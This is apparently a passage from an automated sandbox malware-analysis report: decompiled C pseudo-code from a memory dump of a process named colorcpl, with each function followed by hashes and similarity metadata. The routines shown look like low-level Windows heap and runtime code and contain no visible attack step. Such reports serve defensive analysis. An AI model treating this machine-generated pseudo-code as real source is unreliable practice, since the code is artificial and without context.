                                                                                                				char _v36;
                                                                                                				char _v156;
                                                                                                				short _v158;
                                                                                                				intOrPtr _v160;
                                                                                                				char _v164;
                                                                                                				intOrPtr _v168;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t45;
                                                                                                				intOrPtr _t74;
                                                                                                				signed char _t77;
                                                                                                				intOrPtr _t84;
                                                                                                				char* _t85;
                                                                                                				void* _t86;
                                                                                                				intOrPtr _t87;
                                                                                                				signed short _t88;
                                                                                                				signed int _t89;
                                                                                                
                                                                                                				_t83 = __edx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t89;
                                                                                                				_t45 = _a8 & 0x0000ffff;
                                                                                                				_v158 = __edx;
                                                                                                				_v168 = __ecx;
                                                                                                				if(_t45 == 0) {
                                                                                                					L22:
                                                                                                					_t86 = 6;
                                                                                                					L12:
                                                                                                					E06E1CC50(_t86);
                                                                                                					L11:
                                                                                                					return E06E5B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                                                                				}
                                                                                                				_t77 = _a4;
                                                                                                				if((_t77 & 0x00000001) != 0) {
                                                                                                					goto L22;
                                                                                                				}
                                                                                                				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                                                                				if(_t45 !=  *_t8) {
                                                                                                					goto L22;
                                                                                                				}
                                                                                                				_t9 = _t77 + 0x24; // 0x6f08504
                                                                                                				E06E32280(_t9, _t9);
                                                                                                				_t87 = 0x78;
                                                                                                				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                                                                				E06E5FA60( &_v156, 0, _t87);
                                                                                                				_t13 = _t77 + 0x30; // 0x3db8
                                                                                                				_t85 =  &_v156;
                                                                                                				_v36 =  *_t13;
                                                                                                				_v28 = _v168;
                                                                                                				_v32 = 0;
                                                                                                				_v24 = 0;
                                                                                                				_v20 = _v158;
                                                                                                				_v160 = 0;
                                                                                                				while(1) {
                                                                                                					_push( &_v164);
                                                                                                					_push(_t87);
                                                                                                					_push(_t85);
                                                                                                					_push(0x18);
                                                                                                					_push( &_v36);
                                                                                                					_push(0x1e);
                                                                                                					_t88 = E06E5B0B0();
                                                                                                					if(_t88 != 0xc0000023) {
                                                                                                						break;
                                                                                                					}
                                                                                                					if(_t85 !=  &_v156) {
                                                                                                						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                                                                					}
                                                                                                					_t84 = L06E34620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                                                                					_v168 = _v164;
                                                                                                					if(_t84 == 0) {
                                                                                                						_t88 = 0xc0000017;
                                                                                                						goto L19;
                                                                                                					} else {
                                                                                                						_t74 = _v160 + 1;
                                                                                                						_v160 = _t74;
                                                                                                						if(_t74 >= 0x10) {
                                                                                                							L19:
                                                                                                							_t86 = E06E1CCC0(_t88);
                                                                                                							if(_t86 != 0) {
                                                                                                								L8:
                                                                                                								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                                                                								_t30 = _t77 + 0x24; // 0x6f08504
                                                                                                								E06E2FFB0(_t77, _t84, _t30);
                                                                                                								if(_t84 != 0 && _t84 !=  &_v156) {
                                                                                                									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                                                                								}
                                                                                                								if(_t86 != 0) {
                                                                                                									goto L12;
                                                                                                								} else {
                                                                                                									goto L11;
                                                                                                								}
                                                                                                							}
                                                                                                							L6:
                                                                                                							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                                                                							if(_v164 != 0) {
                                                                                                								_t83 = _t84;
                                                                                                								E06E44F49(_t77, _t84);
                                                                                                							}
                                                                                                							goto L8;
                                                                                                						}
                                                                                                						_t87 = _v168;
                                                                                                						continue;
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t88 != 0) {
                                                                                                					goto L19;
                                                                                                				}
                                                                                                				goto L6;
                                                                                                			}



























                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 882b1999201908595a94a442843b91008c713f49702b7b7707b876c92e590655
                                                                                                • Instruction ID: 6b5ec970bd7be01bcb4d67bfcbae9c88e70da9b5a475bb1c341c3a3264602d0f
                                                                                                • Opcode Fuzzy Hash: 882b1999201908595a94a442843b91008c713f49702b7b7707b876c92e590655
                                                                                                • Instruction Fuzzy Hash: AE417D35E40328DFEBA1EF64DD40BEA77B8EF45710F0510A5E90CAB280DA759E84CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E06E28A0A(intOrPtr* __ecx, signed int __edx) {
                                                                                                				signed int _v8;
                                                                                                				char _v524;
                                                                                                				signed int _v528;
                                                                                                				void* _v532;
                                                                                                				char _v536;
                                                                                                				char _v540;
                                                                                                				char _v544;
                                                                                                				intOrPtr* _v548;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t44;
                                                                                                				void* _t46;
                                                                                                				void* _t48;
                                                                                                				signed int _t53;
                                                                                                				signed int _t55;
                                                                                                				intOrPtr* _t62;
                                                                                                				void* _t63;
                                                                                                				unsigned int _t75;
                                                                                                				signed int _t79;
                                                                                                				unsigned int _t81;
                                                                                                				unsigned int _t83;
                                                                                                				signed int _t84;
                                                                                                				void* _t87;
                                                                                                
                                                                                                				_t76 = __edx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t84;
                                                                                                				_v536 = 0x200;
                                                                                                				_t79 = 0;
                                                                                                				_v548 = __edx;
                                                                                                				_v544 = 0;
                                                                                                				_t62 = __ecx;
                                                                                                				_v540 = 0;
                                                                                                				_v532 =  &_v524;
                                                                                                				if(__edx == 0 || __ecx == 0) {
                                                                                                					L6:
                                                                                                					return E06E5B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                                                                				} else {
                                                                                                					_v528 = 0;
                                                                                                					E06E2E9C0(1, __ecx, 0, 0,  &_v528);
                                                                                                					_t44 = _v528;
                                                                                                					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                                                                					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                                                                					_t46 = 0xa;
                                                                                                					_t87 = _t81 - _t46;
                                                                                                					if(_t87 > 0 || _t87 == 0) {
                                                                                                						 *_v548 = 0x6df1180;
                                                                                                						L5:
                                                                                                						_t79 = 1;
                                                                                                						goto L6;
                                                                                                					} else {
                                                                                                						_t48 = E06E41DB5(_t62,  &_v532,  &_v536);
                                                                                                						_t76 = _v528;
                                                                                                						if(_t48 == 0) {
                                                                                                							L9:
                                                                                                							E06E53C2A(_t81, _t76,  &_v544);
                                                                                                							 *_v548 = _v544;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                						_t62 = _v532;
                                                                                                						if(_t62 != 0) {
                                                                                                							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                                                                							_t53 =  *_t62;
                                                                                                							_v528 = _t53;
                                                                                                							if(_t53 != 0) {
                                                                                                								_t63 = _t62 + 4;
                                                                                                								_t55 = _v528;
                                                                                                								do {
                                                                                                									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                                                                										if(E06E28999(_t63,  &_v540) == 0) {
                                                                                                											_t55 = _v528;
                                                                                                										} else {
                                                                                                											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                                                                											_t55 = _v528;
                                                                                                											if(_t75 >= _t83) {
                                                                                                												_t83 = _t75;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									_t63 = _t63 + 0x14;
                                                                                                									_t55 = _t55 - 1;
                                                                                                									_v528 = _t55;
                                                                                                								} while (_t55 != 0);
                                                                                                								_t62 = _v532;
                                                                                                							}
                                                                                                							if(_t62 !=  &_v524) {
                                                                                                								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                                                                							}
                                                                                                							_t76 = _t83 & 0x0000ffff;
                                                                                                							_t81 = _t83 >> 0x10;
                                                                                                						}
                                                                                                						goto L9;
                                                                                                					}
                                                                                                				}
                                                                                                			}




























                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e5c609c5d902008975e197fadbd1ec1bf7819c7fa03f1405b36bf94cc2838e5d
                                                                                                • Instruction ID: 56a47f9e212a6007b4987ba536d6024df7ddd2320e4cc4c855c9e93fbbc5d366
                                                                                                • Opcode Fuzzy Hash: e5c609c5d902008975e197fadbd1ec1bf7819c7fa03f1405b36bf94cc2838e5d
                                                                                                • Instruction Fuzzy Hash: 384151B5A0033D9BDBA4DF55CC88AEAB3B9FB44304F1055EAD81997245EB709E84CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06EDAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				signed int _v16;
                                                                                                				signed char _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				char* _t37;
                                                                                                				void* _t47;
                                                                                                				signed char _t51;
                                                                                                				void* _t53;
                                                                                                				char _t55;
                                                                                                				intOrPtr _t57;
                                                                                                				signed char _t61;
                                                                                                				intOrPtr _t75;
                                                                                                				void* _t76;
                                                                                                				signed int _t81;
                                                                                                				intOrPtr _t82;
                                                                                                
                                                                                                				_t53 = __ecx;
                                                                                                				_t55 = 0;
                                                                                                				_v20 = _v20 & 0;
                                                                                                				_t75 = __edx;
                                                                                                				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                                                                                				_v24 = __edx;
                                                                                                				_v12 = 0;
                                                                                                				if((_t81 & 0x01000000) != 0) {
                                                                                                					L5:
                                                                                                					if(_a8 != 0) {
                                                                                                						_t81 = _t81 | 0x00000008;
                                                                                                					}
                                                                                                					_t57 = E06EDABF4(_t55 + _t75, _t81);
                                                                                                					_v8 = _t57;
                                                                                                					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                                                                                						_t76 = 0;
                                                                                                						_v16 = _v16 & 0;
                                                                                                					} else {
                                                                                                						_t59 = _t53;
                                                                                                						_t76 = E06EDAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                                                                                						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                                                                                							_t47 = E06EDAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                                                                                							_t61 = _v20;
                                                                                                							if(_t61 != 0) {
                                                                                                								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                                                                                								if(E06EBCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                                                                                									L06E377F0(_t53, 0, _t76);
                                                                                                									_t76 = 0;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					_t82 = _v8;
                                                                                                					L16:
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t37 = 0x7ffe0380;
                                                                                                					} else {
                                                                                                						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                					}
                                                                                                					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                						E06ED131B(_t53, _t76, _t82, _v16);
                                                                                                					}
                                                                                                					return _t76;
                                                                                                				}
                                                                                                				_t51 =  *(__ecx + 0x20);
                                                                                                				_v20 = _t51;
                                                                                                				if(_t51 == 0) {
                                                                                                					goto L5;
                                                                                                				}
                                                                                                				_t81 = _t81 | 0x00000008;
                                                                                                				if(E06EBCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                                                                                					_t55 = _v12;
                                                                                                					goto L5;
                                                                                                				} else {
                                                                                                					_t82 = 0;
                                                                                                					_t76 = 0;
                                                                                                					_v16 = _v16 & 0;
                                                                                                					goto L16;
                                                                                                				}
                                                                                                			}




















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                • Instruction ID: 10d921499ae10c8a5a603b6311b95a356197a237af8050767ef45c7afcfaa63c
                                                                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                • Instruction Fuzzy Hash: 7E31E032F003086BDBA58B69CC45BBFF7AAEF81214F159079E815A7295DA748E03C690
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E06EDFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                                                                                				char _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _t29;
                                                                                                				char* _t32;
                                                                                                				char* _t43;
                                                                                                				signed int _t80;
                                                                                                				signed int* _t84;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t56 = __edx;
                                                                                                				_t84 = __ecx;
                                                                                                				_t80 = E06EDFD4E(__ecx, __edx);
                                                                                                				_v12 = _t80;
                                                                                                				if(_t80 != 0) {
                                                                                                					_t29 =  *__ecx & _t80;
                                                                                                					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                                                                                					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                                                                                						E06EE0A13(__ecx, _t80, 0, _a4);
                                                                                                						_t80 = 1;
                                                                                                						if(E06E37D50() == 0) {
                                                                                                							_t32 = 0x7ffe0380;
                                                                                                						} else {
                                                                                                							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                						}
                                                                                                						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                							_push(3);
                                                                                                							L21:
                                                                                                							E06ED1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                                                                                						}
                                                                                                						goto L22;
                                                                                                					}
                                                                                                					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                                                                                						_t80 = E06EE2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                                                                                						if(_t80 != 0) {
                                                                                                							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                                                                                							_t77 = _v8;
                                                                                                							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                                                                                								E06EDC8F7(_t66, _t77, 0);
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t80 = E06EDDBD2(__ecx[0xb], _t74, __edx, _a4);
                                                                                                					}
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t43 = 0x7ffe0380;
                                                                                                					} else {
                                                                                                						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                					}
                                                                                                					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                                                                                						goto L22;
                                                                                                					} else {
                                                                                                						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                                                                                						goto L21;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_push(__ecx);
                                                                                                					_push(_t80);
                                                                                                					E06EDA80D(__ecx[0xf], 9, __edx, _t80);
                                                                                                					L22:
                                                                                                					return _t80;
                                                                                                				}
                                                                                                			}











                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                • Instruction ID: 5fc497a32e6fc3e2bffa79cd4288363fff9d5f5d354f1b1ff621ea98b9ff4cc3
                                                                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                • Instruction Fuzzy Hash: 3B310832B007446FD7A2DB68CC44F6A77AAEBC5664F186458EC478B381DA74DC43C750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E06EDEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                                                                                				signed int _v8;
                                                                                                				char _v12;
                                                                                                				intOrPtr _v15;
                                                                                                				char _v16;
                                                                                                				intOrPtr _v19;
                                                                                                				void* _v28;
                                                                                                				intOrPtr _v36;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				signed char _t26;
                                                                                                				signed int _t27;
                                                                                                				char* _t40;
                                                                                                				unsigned int* _t50;
                                                                                                				intOrPtr* _t58;
                                                                                                				unsigned int _t59;
                                                                                                				char _t75;
                                                                                                				signed int _t86;
                                                                                                				intOrPtr _t88;
                                                                                                				intOrPtr* _t91;
                                                                                                
                                                                                                				_t75 = __edx;
                                                                                                				_t91 = __ecx;
                                                                                                				_v12 = __edx;
                                                                                                				_t50 = __ecx + 0x30;
                                                                                                				_t86 = _a4 & 0x00000001;
                                                                                                				if(_t86 == 0) {
                                                                                                					E06E32280(_t26, _t50);
                                                                                                					_t75 = _v16;
                                                                                                				}
                                                                                                				_t58 = _t91;
                                                                                                				_t27 = E06EDE815(_t58, _t75);
                                                                                                				_v8 = _t27;
                                                                                                				if(_t27 != 0) {
                                                                                                					E06E1F900(_t91 + 0x34, _t27);
                                                                                                					if(_t86 == 0) {
                                                                                                						E06E2FFB0(_t50, _t86, _t50);
                                                                                                					}
                                                                                                					_push( *((intOrPtr*)(_t91 + 4)));
                                                                                                					_push( *_t91);
                                                                                                					_t59 =  *(_v8 + 0x10);
                                                                                                					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                                                                                                					_push(0x8000);
                                                                                                					_t11 = _t53 - 1; // 0x0
                                                                                                					_t12 = _t53 - 1; // 0x0
                                                                                                					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                                                                                                					E06EDAFDE( &_v12,  &_v16);
                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                					E06EDBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                                                                                                					_t55 = _v36;
                                                                                                					_t88 = _v36;
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t40 = 0x7ffe0388;
                                                                                                					} else {
                                                                                                						_t55 = _v19;
                                                                                                						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                					}
                                                                                                					if( *_t40 != 0) {
                                                                                                						E06ECFE3F(_t55, _t91, _v15, _t55);
                                                                                                					}
                                                                                                				} else {
                                                                                                					if(_t86 == 0) {
                                                                                                						E06E2FFB0(_t50, _t86, _t50);
                                                                                                						_t75 = _v16;
                                                                                                					}
                                                                                                					_push(_t58);
                                                                                                					_t88 = 0;
                                                                                                					_push(0);
                                                                                                					E06EDA80D(_t91, 8, _t75, 0);
                                                                                                				}
                                                                                                				return _t88;
                                                                                                			}























                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                • Instruction ID: b7d1414ada098648364713a341b2a9c675c1d69cb1d3edceed2bc42e1255700a
                                                                                                • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                                                • Instruction Fuzzy Hash: 4F31C3726147059FC7A9DF24CC84A6BB7AAFBC4210F04592DF5668B684DE30E806CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 69%
                                                                                                			E06E969A6(signed short* __ecx, void* __eflags) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				signed int _v24;
                                                                                                				signed short _v28;
                                                                                                				signed int _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				signed int _v40;
                                                                                                				char* _v44;
                                                                                                				signed int _v48;
                                                                                                				intOrPtr _v52;
                                                                                                				signed int _v56;
                                                                                                				char _v60;
                                                                                                				signed int _v64;
                                                                                                				char _v68;
                                                                                                				char _v72;
                                                                                                				signed short* _v76;
                                                                                                				signed int _v80;
                                                                                                				char _v84;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t68;
                                                                                                				intOrPtr _t73;
                                                                                                				signed short* _t74;
                                                                                                				void* _t77;
                                                                                                				void* _t78;
                                                                                                				signed int _t79;
                                                                                                				signed int _t80;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t80;
                                                                                                				_t75 = 0x100;
                                                                                                				_v64 = _v64 & 0x00000000;
                                                                                                				_v76 = __ecx;
                                                                                                				_t79 = 0;
                                                                                                				_t68 = 0;
                                                                                                				_v72 = 1;
                                                                                                				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                                                                				_t77 = 0;
                                                                                                				if(L06E26C59(__ecx[2], 0x100, __eflags) != 0) {
                                                                                                					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                                                					if(_t79 != 0 && E06E96BA3() != 0) {
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						_push(0x1f0003);
                                                                                                						_push( &_v64);
                                                                                                						if(E06E59980() >= 0) {
                                                                                                							E06E32280(_t56, 0x6f08778);
                                                                                                							_t77 = 1;
                                                                                                							_t68 = 1;
                                                                                                							if( *0x6f08774 == 0) {
                                                                                                								asm("cdq");
                                                                                                								 *(_t79 + 0xf70) = _v64;
                                                                                                								 *(_t79 + 0xf74) = 0x100;
                                                                                                								_t75 = 0;
                                                                                                								_t73 = 4;
                                                                                                								_v60 =  &_v68;
                                                                                                								_v52 = _t73;
                                                                                                								_v36 = _t73;
                                                                                                								_t74 = _v76;
                                                                                                								_v44 =  &_v72;
                                                                                                								 *0x6f08774 = 1;
                                                                                                								_v56 = 0;
                                                                                                								_v28 = _t74[2];
                                                                                                								_v48 = 0;
                                                                                                								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                                                                                								_v40 = 0;
                                                                                                								_v32 = 0;
                                                                                                								_v24 = 0;
                                                                                                								_v16 = 0;
                                                                                                								if(E06E1B6F0(0x6dfc338, 0x6dfc288, 3,  &_v60) == 0) {
                                                                                                									_v80 = _v80 | 0xffffffff;
                                                                                                									_push( &_v84);
                                                                                                									_push(0);
                                                                                                									_push(_v64);
                                                                                                									_v84 = 0xfa0a1f00;
                                                                                                									E06E59520();
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				if(_v64 != 0) {
                                                                                                					_push(_v64);
                                                                                                					E06E595D0();
                                                                                                					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                                                                                					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                                                                                				}
                                                                                                				if(_t77 != 0) {
                                                                                                					E06E2FFB0(_t68, _t77, 0x6f08778);
                                                                                                				}
                                                                                                				_pop(_t78);
                                                                                                				return E06E5B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                                                                                			}

































                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2b4c52a51661f88437114aada53783b7b8cb29aacb4f80c2d332ae5bfceb9c17
                                                                                                • Instruction ID: 3fedf7a1ec7c735631cac1b684bf3b4ebe75d016967dd4391e0d0576ea8e484f
                                                                                                • Opcode Fuzzy Hash: 2b4c52a51661f88437114aada53783b7b8cb29aacb4f80c2d332ae5bfceb9c17
                                                                                                • Instruction Fuzzy Hash: 37417CB1D00318AFEBA4DFA5C940BFEBBF8EF48714F14912AE924A7250DB749905CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E06E15210(intOrPtr _a4, void* _a8) {
                                                                                                				void* __ecx;
                                                                                                				intOrPtr _t31;
                                                                                                				signed int _t32;
                                                                                                				signed int _t33;
                                                                                                				intOrPtr _t35;
                                                                                                				signed int _t52;
                                                                                                				void* _t54;
                                                                                                				void* _t56;
                                                                                                				unsigned int _t59;
                                                                                                				signed int _t60;
                                                                                                				void* _t61;
                                                                                                
                                                                                                				_t61 = E06E152A5(1);
                                                                                                				if(_t61 == 0) {
                                                                                                					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                                					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                                                                                                					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                                                                                                				} else {
                                                                                                					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                                                                                                					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                                                                                                				}
                                                                                                				_t60 = _t59 >> 1;
                                                                                                				_t32 = 0x3a;
                                                                                                				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                                                                                                					_t52 = _t60 + _t60;
                                                                                                					if(_a4 > _t52) {
                                                                                                						goto L5;
                                                                                                					}
                                                                                                					if(_t61 != 0) {
                                                                                                						asm("lock xadd [esi], eax");
                                                                                                						if((_t32 | 0xffffffff) == 0) {
                                                                                                							_push( *((intOrPtr*)(_t61 + 4)));
                                                                                                							E06E595D0();
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                                						}
                                                                                                					} else {
                                                                                                						E06E2EB70(_t54, 0x6f079a0);
                                                                                                					}
                                                                                                					_t26 = _t52 + 2; // 0xddeeddf0
                                                                                                					return _t26;
                                                                                                				} else {
                                                                                                					_t52 = _t60 + _t60;
                                                                                                					if(_a4 < _t52) {
                                                                                                						if(_t61 != 0) {
                                                                                                							asm("lock xadd [esi], eax");
                                                                                                							if((_t32 | 0xffffffff) == 0) {
                                                                                                								_push( *((intOrPtr*)(_t61 + 4)));
                                                                                                								E06E595D0();
                                                                                                								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                                                                                                							}
                                                                                                						} else {
                                                                                                							E06E2EB70(_t54, 0x6f079a0);
                                                                                                						}
                                                                                                						return _t52;
                                                                                                					}
